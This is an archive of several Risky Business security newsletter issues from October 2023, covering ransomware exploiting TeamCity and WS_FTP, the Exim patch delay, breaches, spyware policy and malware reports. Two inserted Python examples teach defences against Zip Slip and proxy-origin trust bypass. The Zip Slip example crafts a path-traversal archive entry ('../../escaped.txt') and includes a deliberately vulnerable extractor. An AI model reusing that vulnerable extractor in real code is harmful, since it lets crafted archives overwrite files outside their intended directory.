"Unfortunately, as usually happens during the disclosure process, the vendor tried to reduce the final impact of the documented vulnerabilities. We believe this to be an extremely wrong position, since end customers will have incorrect information when assessing the severity of a particular update. We encourage system administrators to keep their BMC systems up to date and follow NSA and CISA hardening guidelines."

Infosec industry

BlackBerry split: BlackBerry plans to separate its IoT and cybersecurity services into two independently operated entities and then file for an IPO for its IoT subsidiary.

Free cybersecurity help for NGOs: A consortium of cybersecurity organizations will provide free cybersecurity services to more than 200 NGOs around the globe.

CISA Security Planning Workbook: CISA has published a new free resource named the Security Planning Workbook, a document meant to help organizations create basic security plans.

IAM guidance for vendors: CISA and the NSA have published guidance for software vendors and developers on how to properly implement multi-factor authentication (MFA) and single sign-on (SSO) technologies in order to develop better Identity and Access Management (IAM) systems. The two agencies say the new guidance is complementary to guidance they published earlier this year in March that targeted IT admins.

New tool—OpenPubkey: The Linux Foundation has open-sourced OpenPubkey, a cryptographic protocol designed to secure software supply chains.

"OpenPubkey enables users to securely and accurately bind cryptographic keys to users and workloads by turning an OpenID Connect Identity Provider (IdP) into a Certificate Authority (CA)."

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq examine whether offensive cyber operations against ransomware groups have succeeded or failed. And how would we even know?

Risky Biz News: Ransomware gangs hit TeamCity and WS_FTP servers

4 October 2023 at 00:30

This newsletter is brought to you by Proofpoint. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

Ransomware groups are exploiting recently disclosed vulnerabilities in TeamCity and WS_FTP servers to breach corporate networks and ransom organizations.

The attacks are exploiting CVE-2023-42793 and CVE-2023-40044.

The first is an authentication bypass and RCE vulnerability that can allow threat actors to take full control of JetBrains TeamCity CI/CD servers. Once on the development pipeline, threat actors can pivot to other resources on a company's internal or cloud network, from where ransomware gangs can do extensive damage.

The second is a remote code execution in WS_FTP, a file-transfer application developed by Progress Software—the same company that also made the MOVEit file-sharing server, heavily exploited by the Clop gang earlier this year in hacks that impacted more than 2,000 organizations. This bug is particularly nasty because it can be exploited with one HTTPS POST request.

In both cases, exploitation began over the past weekend after proof-of-concept code was published online for both vulnerabilities. There are reports of attacks against TeamCity servers from Prodaft and attacks against WS_FTP servers from Huntress, Rapid7, and Kevin Beaumont.

Unlike previous vulnerabilities that impacted enterprise gear, these are in products that aren't so widely used—when compared to the likes of Citrix, Cisco, Fortinet, or VMWare products.

According to reports, there are roughly 1,200 TeamCity servers and from 550 to 4,300 WS_FTP servers connected to the internet.

Some security experts have said the numbers are too small to make threat actors care about the vulnerabilities since there are more abundant targets online that can be exploited; however, the recent attacks show the contrary.

The reality is that easy money is still easy money, especially for ransomware gangs after free exploits landed in their laps last week.

Breaches, hacks, and security incidents

ETSI hack: The European Telecommunications Standards Institute (ETSI) says hackers have stolen a database containing information on all users who registered on its website.

Lorenz leak: The website of the Lorenz ransomware gang has leaked every message ever sent through its contact form. Copies of all messages are available here.

Russian intelligence leak: Moscow officials have accidentally leaked the secret locations of Russian military and intelligence facilities. The data was part of a 434-page document that was available on the website of the Moscow City Hall. The document contained a list of all "special consumers" on the Russian electricity grid—locations that should never be disconnected from the grid and where a constant flow of electricity should be made available at all times. Most of the entries in this special group included critical infrastructure objectives, such as hospitals and train stations, but the document also exposed the exact locations of facilities maintained by the Russian military and Russian intelligence agencies. The leaked data has been used to create an interactive map that reporters argue could be useful for the Ukrainian Armed Forces in selecting future targets. [Additional coverage in the Dossier Center]

General tech and privacy

Mandatory MFA on AWS root: Amazon is making multi-factor authentication mandatory for all AWS accounts with root access to an organization's management console. The change will take effect in mid-2024. Amazon plans to expand the mandatory MFA requirement to other types of accounts throughout the next year.

GCP moves security features behind paywall: Google Cloud has moved the Policy Intelligence smart access control feature from the company's free tier to its paid Security Command Center subscription plan. The Policy Intelligence feature allows Google Cloud customers to analyze IAM policies and identify cloud resources that have extensive permissions. Google's move to restrict access to crucial security features comes after Microsoft gave customers free access to 31 cloud security log types earlier this year.

Mastodon yearly report: Mastodon has published its yearly activity report for 2022. The company reported €326,000 in donations, more than 9,600 active Mastodon servers, and 5.8 million registered users (at the end of 2022).

Google announces new Gmail anti-spam features: Google has introduced new anti-spam features for companies and individuals who send more than 5,000 emails to Gmail users each day. The company says that by February 2024, all bulk senders must authenticate their email servers using modern security standards and provide an easy way for users to unsubscribe from future emails. Google says it will keep an eye on spam thresholds and mark abusive bulk senders as spam if necessary.

Google alters search results for profit: Documents from Google's anti-trust case in the US have revealed that the company is altering billions of user search queries each day in order to return search results that contain more ads. [Additional coverage in Wired/non-paywall]

"Here's how it works. Say you search for "children's clothing." Google converts it, without your knowledge, to a search for 'NIKOLAI-brand kidswear,' making a behind-the-scenes substitution of your actual query with a different query that just happens to generate more money for the company, and will generate results you weren't searching for at all. It's not possible for you to opt out of the substitution. If you don't get the results you want, and you try to refine your query, you are wasting your time. This is a twisted shopping mall you can't escape."

Google lends a hand to Twitter: After destroying its own advertising business because its CEO can't stop promoting neo-nazi ideology, Twitter has decided to rent its near-zombie ad space to Google's Ads platform. More from tech and privacy activist Lauren Weinstein.

Government, politics, and policy

Japan to switch to domestic security software: The Japanese government will switch to using domestically-developed security software during fiscal year 2025. Officials say the move is part of an effort to improve the collection and analysis of telemetry and cyberattack data. Development of the new system is scheduled to finish by the end of March next year. The new system will be compatible with Windows systems and security software from Japanese companies. [Additional coverage in Nikkei]

GAO cybersecurity report: A GAO report found that federal agencies and critical infrastructure entities need to do a better job at sharing cyber threat intel information in order to effectively tackle increasingly complex cyber threats.

"Long-standing challenges, such as security concerns and timeliness, make this harder. For example, representatives from a nonfederal partner said the FBI briefed them on a cyber threat about 5 months after it was identified."

European Media Freedom Act: The European Parliament has proposed an updated version of the European Media Freedom Act that includes a ban on the use of spyware against journalists. The new document does not introduce a full blanket ban. Spyware may be used against journalists as a "last resort" and on a "case-by-case basis" under judicial authority to investigate serious crimes, such as terrorism or human trafficking.

FSB wants to track geolocation data: The Russian FSB intelligence service has put forward a draft law that will require all internet service providers to store the geolocation and payment information of their users. The draft law has been filed with the Russian Parliament. If approved, the law will apply to large internet companies active in Russia. These companies are already mandated by law to store all sorts of user data, which they have to make available to law enforcement investigations. [Additional coverage in Svoboda]

Formal VPN ban incoming: Russian communications watchdog Roskomnadzor plans to formally ban mobile VPN apps starting next year. The ban is scheduled to go into effect on March 1, 2024. After that date, mobile app stores like the Google Play Store and the Apple App Store will be forbidden from listing VPN apps to Russian users. [Additional coverage in RIA Novosti]

Sponsor section

In this Risky Business News sponsor interview, Tom Uren talks to Selena Larson, Senior Threat Intelligence Analyst at Proofpoint, about the state of play in the cybercrime ecosystem. People and organizations are getting better at protecting themselves from scams and compromises, but criminals will use every possible avenue to reach people and scam them.

Cybercrime and threat intel

Thai crypto scammers detained: Thai authorities have arrested five members of a cybercrime group that ran investment-romance fraud operations, commonly known as "pig butchering" scams. The suspects were detained last month, and officials seized $277 million worth of crypto-assets the gang stole from victims. Thai police were aided in their investigation by Binance's security team, which also helped dismantle a second smaller criminal group involved in crypto money laundering operations.

Thunderbird ransomware warning: The Mozilla Foundation is warning customers a ransomware gang is using its Thunderbird email app as a lure to deploy ransomware and encrypt networks.

Malicious npm packages: Fortinet has a report on a set of malicious JavaScript packages spotted on the official npm repository.

Supply chain report: Threat actors have published more than 245,000 malicious packages over the past calendar year, a figure twice as large as the two previous years combined. The number shows a clear and visible increase in attacks targeting the software supply chain, according to a recent report published by DevSecOps firm Sonatype. The same report found that software rot is also widespread in the JavaScript and Java ecosystems, where 18.6% of open-source projects maintained in 2022 had been abandoned this year.

Umbreon interview: DataBreaches.net has a three-part interview with Dutch hacker Umbreon, known for operating as DataBox and selling hacked data on the old RAID and Breached forums. See parts one, two, and three.

Malware technical reports

Mystic Stealer: OALABS has published an analysis and IOCs for the Mystic infostealer, launched earlier this year in April.

Knight ransomware: CloudSek takes a look at the Knight ransomware, a rebranded version of the old Cyclops RaaS. Knight is one of the few RaaS platforms currently active today that offers Android and macOS versions besides the classic Windows, Linux, and ESXi—although whether they actually work is another matter. Knight is written in Go.

Sponsor Demo Section

This is a new demo! Ryan Kalember shows Risky Business host Patrick Gray Proofpoint's Sigma platform. Sigma is a data loss prevention and insider threat detection tool that crunches data from different sources and presents a unified view of it.

APTs and cyber-espionage

APT41's Android malware: ThreatFabric has published an in-depth analysis of two Android malware strains used by the APT41 Chinese cyber-espionage group. They're named LightSpy and AndroidControl and correspond to the DragonEgg and WyrmSpy strains first spotted by Lookout earlier this year.

REF5961: Elastic's security team has published a report on REF5961, a cyber-espionage group they found on the network of a Foreign Affairs Ministry from a member of the Association of Southeast Asian Nations (ASEAN). Elastic says it found the group's tools next to the malware of another cyber-espionage group it tracks as REF2924. REF5961's arsenal includes malware such as EAGERBEE, RUDEBIRD, and DOWNTOWN.

"Further, the correlation of execution flows, tooling, infrastructure, and victimology of multiple campaigns we're tracking along with numerous third-party reports makes us confident this is a China-nexus actor."

Konni: ThreatMon researchers have published a report on Konni, a North Korean APT group, and its recent campaign delivering malicious ISO files.

Cytrox infrastructure: French security firm Sekoia has identified domains and servers operated by spyware maker Cytrox (which they call Lycantrox). Servers appear to be located in Portugal, Angola, Kazakhstan, Indonesia, Egypt, Madagascar, and the Persian Gulf.

Vulnerabilities, security research, and bug bounty

Android patches two zero-days: The Android project has published security updates for the month of October to fix two actively exploited zero-days. The patches fix zero-days in the Libwebp library (CVE-2023-4863) and the Arm Mali GPU driver (CVE-2023-4211). The first is the same zero-day spotted by CitizenLab last month in attacks deploying the Pegasus spyware on Android and iPhone devices. Details about the second zero-day are not available, but Arm credited two Google security researchers for discovering the attacks.

Qualcomm exploitation: US chipmaker Qualcomm says threat actors are exploiting four vulnerabilities in its firmware in limited, targeted attacks. The attacks are targeting a bug patched in May 2022 (CVE-2022-22071) and three zero-days the company patched this week (CVE-2023-33106, CVE-2023-33107, and CVE-2023-33063). The attacks are targeting Adreno GPU and Compute DSP drivers. Qualcomm says it was notified of the ongoing exploitation by Google's Project Zero security team.

Recent zero-days in MSFT products: Microsoft says it reviewed its products and patched apps that are vulnerable to the recent Libwebp (CVE-2023-4863) and Libvpx (CVE-2023-5217) zero-days. Patches were made available to Edge, Teams, Skype, and various Microsoft Store extensions that support the WebP format.

Exim patches RCE bug: The Exim email server team has released patches for three of six zero-days disclosed last week by Trend Micro's ZDI project. Of the fixed zero-days, the most important vulnerability is an unauthenticated remote code execution bug tracked as CVE-2023-42115. Although the vulnerability sounds bad, reports from the Exim team and watchTowr Labs say the bug is overhyped and hard to exploit.

"But in the meantime, don't panic - this one is more of a damp squib than a world-ending catastrophe."

Linux LPE: StarLabs researchers have published an analysis of CVE-2023-31248, an LPE vulnerability in the Linux kernel.

Looney Tunables: Qualys researchers have published an analysis of Looney Tunables (CVE-2023-4911), an LPE vulnerability in the GNU C Library. The bug impacts all versions released since April 2021 and primarily affects Linux distributions. Patches have been released this week.

OpenRefine vulnerability: SonarSource has discovered a Zip Slip vulnerability in OpenRefine, a Java tool for working with and cleaning up complex and messy data.

"A Zip Slip vulnerability is caused by inadequate path validation when extracting archives, which may allow attackers to overwrite existing files or extract files to unintended locations."
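The extraction flaw the quote describes, shown as an added example that is not OpenRefine's code or SonarSource's finding: a constructed archive carries an entry named `../../escaped.txt`, the naive extractor joins that name onto the target directory and writes outside it, and the hardened extractor resolves every entry path and refuses the archive before touching the filesystem. Python's own `ZipFile.extractall` already strips such names, so the vulnerable pattern is written out by hand here to mirror what affected code typically does.

```python
"""Zip Slip: vulnerable versus validated archive extraction (added example)."""
import io
import os
import tempfile
import zipfile


def build_malicious_zip() -> bytes:
    """Constructed sample archive: one benign entry plus one whose name climbs
    out of the extraction directory (the classic Zip Slip entry)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("data/safe.txt", "harmless")
        zf.writestr("../../escaped.txt", "written outside the target dir")
    return buf.getvalue()


def extract_naive(archive: bytes, dest: str) -> list:
    """Vulnerable pattern: joins the entry name onto dest and trusts the result.
    Returns the resolved paths that were actually written."""
    written = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for member in zf.infolist():
            target = os.path.join(dest, member.filename)  # no validation at all
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(member) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(os.path.realpath(target))
    return written


def is_safe_entry(dest: str, name: str) -> bool:
    """True only if name, resolved against dest, stays inside dest.
    realpath normalizes '..' segments and symlinked dest dirs; absolute entry
    names are caught too, because os.path.join discards dest for them."""
    root = os.path.realpath(dest)
    candidate = os.path.realpath(os.path.join(root, name))
    return os.path.commonpath([root, candidate]) == root


def extract_safe(archive: bytes, dest: str) -> list:
    """Hardened pattern: validate every entry name before writing anything,
    so a bad entry in the middle of the archive cannot leave a half-written tree."""
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        members = zf.infolist()
        bad = [m.filename for m in members if not is_safe_entry(dest, m.filename)]
        if bad:
            raise ValueError(f"archive entries escape {dest!r}: {bad}")
        root = os.path.realpath(dest)
        written = []
        for member in members:
            target = os.path.realpath(os.path.join(root, member.filename))
            if member.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(member) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(target)
    return written


def demo() -> dict:
    """Extract the constructed archive both ways into a scratch directory and
    report which files escaped and whether the hardened extractor refused it."""
    archive = build_malicious_zip()
    with tempfile.TemporaryDirectory() as scratch:
        target = os.path.join(scratch, "a", "b")  # two levels deep so ../../ lands in scratch
        os.makedirs(target)
        root = os.path.realpath(target)
        escaped = [os.path.basename(p) for p in extract_naive(archive, target)
                   if os.path.commonpath([root, p]) != root]
        try:
            extract_safe(archive, target)
            blocked = False
        except ValueError:
            blocked = True
    return {"naive_escaped": escaped, "safe_blocked": blocked}


if __name__ == "__main__":
    print(demo())  # {'naive_escaped': ['escaped.txt'], 'safe_blocked': True}
```

The same `is_safe_entry` check applies to tar and other archive formats; the important property is that the decision is made on the resolved path, not on a string search for `..`, which misses absolute names and symlinked parents.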

ShellTorch vulnerabilities: Oligo Security has disclosed details on ShellTorch, three vulnerabilities impacting TorchServe, a server for running PyTorch machine learning processes. Of the three, the most severe is a remote code execution vulnerability (CVE-2023-43654) that allows unauthorized access to TorchServe management interfaces. Oligo says the RCE could be used to upload unauthorized data and alter ML models.

ConnectedIO router bugs: Claroty has identified several vulnerabilities in the firmware and cloud platform of ConnectedIO, a maker of 3G and 4G routers. The routers are typically used as components in IoT products to allow the devices to connect to the internet.

Infosec industry

Cybersecurity spending forecast: Research and consulting firm Gartner expects cybersecurity and risk management spending to reach $215 billion in 2024, up 14.3% from 2023. Gartner put out a positive forecast despite the recent decreases in cybersecurity investments and several rounds of layoffs across the infosec industry. The company attributes the rise in spending to the continued adoption of cloud technologies and a large hybrid workforce.

New tool—cloudgrep: Cado Security has open-sourced cloudgrep, a tool for searching resources across S3 cloud storage servers.

"It currently supports searching log files, optionally compressed with gzip (.gz) or zip (.zip), in AWS S3."

New tool—KubeHound: DataDog's security team has open-sourced a tool named KubeHound that can be used to analyze Kubernetes clusters and create graphs of possible attack paths.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq examine how US and UK strategies to use cyber power differ but are in some ways mirror images of each other.

Risky Biz News: Disclosure snafu delays critical Exim patch more than a year

2 October 2023 at 00:30

This newsletter is brought to you by Proofpoint. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

A critical vulnerability impacting more than 3.5 million Exim email servers has remained unpatched for more than 15 months in one of the most egregious instances of vulnerability disclosure snafus in recent history.

Tracked as CVE-2023-42115, the vulnerability is a no-authentication remote code execution bug with a severity rating of 9.8/10.

It is one of six vulnerabilities that were disclosed by Trend Micro's Zero-Day Initiative (ZDI) to the Exim project in June 2022.

While you'd think a bug like this would get the Exim team's immediate attention, things didn't pan out as expected.

After the six vulnerabilities were publicly disclosed last week, the Exim team blamed ZDI for the lack of a timely patch. In a mailing list discussion, the Exim team says they received the bug report in June 2022, but the report lacked the details necessary to identify the root cause of the bug and release a patch. When they asked for additional information, ZDI took 11 months to reply, providing it only in May 2023.

Exim project member Heiko Schlittermann says they have patches for three of the six ZDI bugs, but they are currently only available via a private repository.

In a different mailing list discussion, Exim member Florian Zumbiehl says they have "no idea whether [the patch] actually addresses what ZDI has reported," suggesting ZDI has yet to provide an accurate description for the bugs they reported 15 months ago.

It's hard to blame any of the parties here, but that doesn't make this any less of a clusterf**k.

For starters, ZDI intermediates bug reports between anonymous researchers and software vendors, meaning it can only relay what information the researcher makes available to its staff. If the researcher—credited as "Anonymous" in the Exim bugs—doesn't respond for 11 months or doesn't provide the needed information, it is hardly ZDI's fault.

Second, as the mailing list discussion shows, it's hard to blame the Exim team either. It's impossible to patch a no-auth RCE without the details needed to identify the vulnerable component.

Playing the blame game also diverts our focus from the real problem—the fact that more than 3.5 million Exim servers are now waiting for a patch that may not even work.

With Exim accounting for 56% of email servers, this leaves more than half of the internet's email infrastructure exposed to dangerous attacks if threat actors manage to identify the root cause of the bug.

Obviously, the chances of active exploitation are pretty slim. If neither ZDI nor Exim is sure the current (private) patch works, an attacker won't figure out an exploit either.

Once a patch is out, server owners will need to hurry and apply it as soon as possible, regardless of whether it works or not. Threat actors will most likely rush to bin-diff the Exim code, identify the patched component, and attempt to exploit the bug.

Exim servers have been a target for hackers every time a major vulnerability has been available. What makes them attractive is the sheer number of systems available for exploitation, which makes it easy to always keep a botnet fed with new bots every few days.

One of the most dangerous groups that has exploited Exim servers in the past is Sandworm, a cyber-espionage unit inside Russia's military intelligence service. In May 2020, the NSA spotted Sandworm hacking Exim servers in order to build up its proxy infrastructure, something it will likely attempt again if this new bug makes it possible.

Breaches, hacks, and security incidents

DarkBeam leak: Cyber risk management company DarkBeam has leaked more than 3.8 billion records after it left an Elasticsearch server unprotected on the internet. The database contained information from older breaches that DarkBeam was using to send alerts to customers. While the leaked data had already been public via separate, smaller breaches, the DarkBeam leak made it easier to download everything in one go. The company fixed the leaky server as soon as it was notified. [Additional coverage in CyberNews]

General tech and privacy

Twitter fires election disinformation team: After disabling an election disinformation reporting tool, it appears that Elon Musk fired half of the election integrity team, even though he had told EU officials a month earlier that he would expand it. [Additional coverage in TechDirt]

BharOS leak: India's native operating system BharOS is just a badly disguised fork of GrapheneOS. The government research lab in charge of developing the operating system leaked its source code last week, which led to some interesting discussions among Indian experts.

Photoshop web versions: Adobe has released a web version of its Photoshop image editing software. Access is available to paid customers only.

Block Google's AI scrapers: Google now lets you use the robots.txt file to block its garbage and annoying AI scraping technology.

Stupid Apple iOS feature: The recently released iOS 17 operating system contains a new feature that keeps old passcodes alive for 72 hours after they've been changed. Apple says the feature is meant to allow users to regain access to their iPhones in case they forget their new passcode. Security experts say the feature could allow threat actors to regain access to a device even after the owner has changed an older passcode. Users can force older passcodes to expire immediately in the phone's "Face ID & Passcode" section—although this is not widely known among iOS 17 users.

Government, politics, and policy

US AI Security Center: The US National Security Agency has announced the creation of an AI Security Center under the US DOD that will study and adopt AI technologies for national security and the defense industrial base. The new center will work with the intelligence community, the DOD, national research labs, and the US private sector, but also select foreign partners. The move comes after reports that China is exploring the use of AI for military weapons.

SBU infiltrated ransomware gangs: In an interview with NPR, Illia Vitiuk, Head of the Department of Cyber and Information Security of the Security Service of Ukraine (SBU), says the agency has had an influx of convicted cybercriminals who joined its ranks to help protect the country. Some of these volunteers have allegedly penetrated ransomware gangs, including "Russian ransomware groups working for special services."

Pegasus in Israel: Israeli officials have allowed local police to deploy the Pegasus spyware in a one-time case to investigate the murder of a Palestinian family. Officials have allowed police to use the spyware for surveillance but not to extract data from infected devices. [Additional coverage in the Times of Israel]

Greece spyware investigation: The Greek ruling government has sabotaged an independent commission meant to investigate the country's use of the Predator spyware. The Mitsotakis government replaced all members of the ADAE commission hours before they were set to meet and fine the EYP intelligence service for using spyware against civilian and political targets. The EYP was in line to receive a €100,000 fine. The move didn't go unnoticed and was criticized by the EU's PEGA commission, established to investigate spyware abuses across Europe. [Additional coverage in Reporter]

Sponsor section

In this sponsored podcast Proofpoint’s Selena Larson talks with Tom Uren about recent changes in the e-crime ecosystem.

Cybercrime and threat intel

French hacker pleads guilty: A member of the infamous ShinyHunters hacking group has pleaded guilty in a US court to hacking-related charges. Sebastien Raoult was one of three ShinyHunters hackers who breached companies all over the world and sold their data on underground forums. The 22-year-old Frenchman created phishing pages to compromise employee accounts, gain access to cloud resources, and then steal their data. US officials charged the trio in June 2021. Raoult was arrested in Morocco last year and extradited to the US in January. Raoult used the hacker name "Sezyo Kaizen." His two accomplices, Gabriel Bildstein (Gnostic Players, Kuroi) and Abdel-Hakim El-Ahmadi (Zac, Jordan Keso), are still at large.

Scammers detained in India: Indian authorities have dismantled a network of eight call centers in the city of Guwahati that conducted tech support scams. Authorities detained 250 workers, including three suspects believed to be the call centers' administrators. Officials say the three were part of an international gang with a presence all over India. Guwahati police say the call centers operated at night and used pop-up ads to trick people into calling for tech support. Callers were misled into installing malware on their systems and then tricked into making payments via bitcoin or gift vouchers. [Additional coverage in India Today]

New hacking forum: CyFirma security researcher Kaushík Pał has discovered a new hacking forum named SeekShell that launched earlier this year.

RaaS drama alert: The Donut Leaks ransomware gang is asking the INC Ransom group to not accept and publish any data from one of their past affiliates, who they describe as a scammer. Drama! We love it!

Malicious ads in Bing AI chat: Malwarebytes researchers have found malicious ads being injected and delivered via Bing Chat AI responses. AI is smart but not smart enough to spot malware, apparently.

Malware adopts smart contracts: A malware gang is storing parts of malicious JavaScript code inside smart contracts hosted on the Binance blockchain. The malicious code is used inside websites peddling fake browser updates that infect users with infostealers. According to FINSIN, the technique prevents security researchers from taking down the malicious code since it's not hosted on a web page but on an immutable blockchain.

New npm malware: Twenty-six malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details.

Reddit malware incident: A threat actor tried to bait users of the r/cybersecurity subreddit to download malware on their systems. The lure was a collection of leaked credentials, and the final payload was the WarZone RAT.

AWS honeypots: AWS's threat intel team says that it takes roughly three minutes for threat actors to discover new honeypots and attempt to compromise them.

"This is an astonishingly short amount of time, considering that these workloads aren't advertised or part of other visible systems that would be obvious to threat actors. This clearly demonstrates the voracity of scanning taking place and the high degree of automation that threat actors employ to find their next target."

Clop torrents investigation: Back in June, the Clop gang began releasing some of the data from the MOVEit hacks as torrent files after it began having problems with its hosting infrastructure. Researchers from Palo Alto Networks have analyzed the seeds of the Clop torrent files and found that most of the stolen MOVEit files have been released through three IP addresses belonging to Moscow-based web hosting provider FlyServers.

Phantom Hacker scams: The FBI is seeing an increase in a new scam targeting the elderly named Phantom Hacker. The scam relies on calling victims as bank representatives, telling users they've been hacked, and convincing them to move funds to a new account, typically under the scammer's control. The FBI says a recent variation of this scam involves three different scammers calling the victim, posing as representatives for banks, tech firms, and the government, in order to reinforce the need to move funds.

Malware technical reports

RustDesk malware: Dr.Web has identified several desktop remote-control Android apps that contain malware and are ranking high in search results on the Play Store. The apps are named AweSun Remote Desktop, RustDesk Remote Desktop, and AnyDesk Remote Desktop. Dr.Web says the apps are being used by threat actors to take control of Android devices and steal money from any installed e-payment apps.

BunnyLoader: A new malware-as-a-service (MaaS) offering named BunnyLoader launched last month on underground malware forums.

GuLoader: French cybersecurity firm Intrinsec has a 31-page report on the GuLoader malware, the Italian company behind it, and its recent campaigns.

Sponsor Demo Section

Ryan Kalember shows Risky Business host Patrick Gray Proofpoint's Sigma platform. Sigma is a data loss prevention and insider threat detection tool that crunches data from different sources and presents a unified view of it.

APTs and cyber-espionage

Lazarus poses as Meta recruiter: North Korean cyberespionage group Lazarus has compromised the network of a Spanish aerospace company by tricking an employee into running malware on a work computer. Security firm ESET says the attack was successful after Lazarus members posed as recruiters for Facebook's parent company Meta and asked the victim to solve two trojanized coding challenges. The hack took place earlier this year and infected the company with a stealthy new backdoor named LightlessCan. ESET says the attack was part of a long-running Lazarus operation named DreamJob, where Lazarus members pose as recruiters on LinkedIn.

Oilrig: The Oilrig (APT34) Iranian cyber-espionage group has launched attacks against Saudi targets with malicious documents that delivered a new variant of the SideTwist backdoor named Menorah.

Chinese disinformation efforts: The US State Department has published a report detailing China's disinformation efforts, its techniques, and goals.

"The PRC promotes digital authoritarianism, which involves the use of digital infrastructure to repress freedom of expression, censor independent news, promote disinformation, and deny other human rights. Through disseminating technologies for surveillance and censorship, often through capabilities bundled under the umbrella of "smart" or "safe cities," the PRC has exported aspects of its domestic information environment globally. Beijing has also propagated information control tactics, with a particular focus on Africa, Asia, and Latin America. In parallel, the PRC has promoted authoritarian digital norms that other countries have adopted at a rapid pace. As other countries emulate the PRC, their information ecosystems have become more receptive to Beijing's propaganda, disinformation, and censorship requests."

Vulnerabilities, security research, and bug bounty

Vulnerability exploitation trends: Google's Mandiant division is seeing threat actors target a more diverse set of vendors and products than before. Mandiant says that over the past two years, Microsoft, Google, and Apple accounted for less than 50% of targeted vulnerabilities. This marked the first time products from the Big Three were targeted less than products from other vendors since Mandiant began tracking exploit attempts. The top other vendors included Apache, VMware, Zoho, and SonicWall.

Progress WS_FTP security updates: The company behind the MOVEit file-sharing server has patched another set of critical vulnerabilities in another file-transfer application, WS_FTP Server. Eight bugs have received patches, including two with severity ratings of 10 (CVE-2023-40044) and 9.9 (CVE-2023-42657). Exploitation is trivial and requires a single HTTPS POST request. There are currently more than 550 WS_FTP servers connected to the internet, according to Shodan.

TeamCity exploitation: After a PoC was released last week, threat actors are now exploiting a vulnerability (CVE-2023-42793) in the JetBrains TeamCity CI/CD server to gain access to corporate repositories.

SharePoint PoC: A PoC was posted online for an RCE vulnerability in Microsoft SharePoint servers (CVE-2023-29357). The PoC comes after StarLabs researchers posted a detailed write-up of the bug last week.

"The exploit script facilitates the impersonation of authenticated users, allowing attackers to execute arbitrary code in the context of the SharePoint application pool and the SharePoint server farm account, potentially causing a denial of service (DoS)."

Cloudflare bypass: Security firm Certitude has identified a weakness in Cloudflare's platform that allows threat actors to bypass security features. The weakness is that Cloudflare automatically trusts any traffic originating from its own platform. Certitude says threat actors can host attack infrastructure on the platform and successfully target other customers, bypassing firewalls, bot protections, and other security protections. The company reported the issues to Cloudflare, but the report was closed without a fix.
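The trust problem above, as an added example that is neither Certitude's nor Cloudflare's code: an origin that only allowlists the proxy's egress ranges accepts traffic from every tenant of the platform, because all of it arrives from the same addresses. Pairing the range check with a per-zone secret that the edge injects and the origin verifies closes that gap. The IP ranges, the `x-origin-secret` header name and the secret value are constructed assumptions for the demo.

```python
"""Origin-side request authorization: IP allowlist alone vs. allowlist plus a
per-zone shared secret (added example, constructed values throughout)."""
import hmac
import ipaddress

# Constructed stand-in for the proxy's published egress ranges that many
# origin firewalls allowlist. A real deployment loads the real list.
PROXY_RANGES = [ipaddress.ip_network(n) for n in ("203.0.113.0/24", "2001:db8:cf::/48")]

# Assumed per-zone secret and header name; the edge config for *this* zone adds
# the header, and no other tenant of the platform knows the value.
ORIGIN_SECRET = b"constructed-shared-secret-rotate-me"
SECRET_HEADER = "x-origin-secret"


def from_proxy(src_ip: str) -> bool:
    """Range check alone. Every tenant's traffic passes it, which is the
    weakness described in the item above: it proves the hop, not the sender."""
    ip = ipaddress.ip_address(src_ip)
    return any(ip in net for net in PROXY_RANGES)


def authorized_request(src_ip: str, headers: dict) -> bool:
    """Range check plus proof the request passed through this zone's edge config.
    The secret compare is constant-time so timing does not leak the value."""
    if not from_proxy(src_ip):
        return False
    lowered = {k.lower(): v for k, v in headers.items()}
    presented = lowered.get(SECRET_HEADER, "").encode()
    return hmac.compare_digest(presented, ORIGIN_SECRET)


# Constructed sample requests as (source IP, headers) pairs:
#   own_zone:     proxied through the defender's own zone, header present
#   other_tenant: proxied through some other tenant's zone, same egress range
#   direct:       hits the origin IP directly, never touched the edge
SAMPLE_REQUESTS = {
    "own_zone": ("203.0.113.10", {"X-Origin-Secret": ORIGIN_SECRET.decode()}),
    "other_tenant": ("203.0.113.10", {"X-Forwarded-For": "198.51.100.7"}),
    "direct": ("198.51.100.7", {"X-Origin-Secret": ORIGIN_SECRET.decode()}),
}


def evaluate() -> dict:
    """Return {name: (ip_only_verdict, ip_and_secret_verdict)} for each sample."""
    return {
        name: (from_proxy(ip), authorized_request(ip, hdrs))
        for name, (ip, hdrs) in SAMPLE_REQUESTS.items()
    }


if __name__ == "__main__":
    for name, verdicts in evaluate().items():
        print(f"{name:13s} ip_only={verdicts[0]!s:5s} ip_and_secret={verdicts[1]}")
```

The `other_tenant` row is the case the item describes: it passes the IP-only check and fails the secret check. A zone-specific client certificate enforced at the TLS layer achieves the same binding with stronger guarantees than a header, but the shared-secret header is the smallest change that stops the origin from treating "came from the proxy" as "came from my zone".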

Infosec industry

IronNet shuts down: Cybersecurity firm IronNet has ceased all operations across all subsidiaries after the company ran out of funds. In an SEC filing, the company says it plans to file for Chapter 11 bankruptcy proceedings. The news comes after the company furloughed the vast majority of its workers at the start of September. [Additional coverage in SecurityWeek]

New tool—DavRelayUp: ShorSec has open-sourced a tool named DavRelayUp to perform NTLM+LDAP relay attacks.

Malware code: The source code of the Sub7 trojan (from the late 90s) has been released on GitHub.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq examine how US and UK strategies to use cyber power differ but are in some ways mirror images of each other.
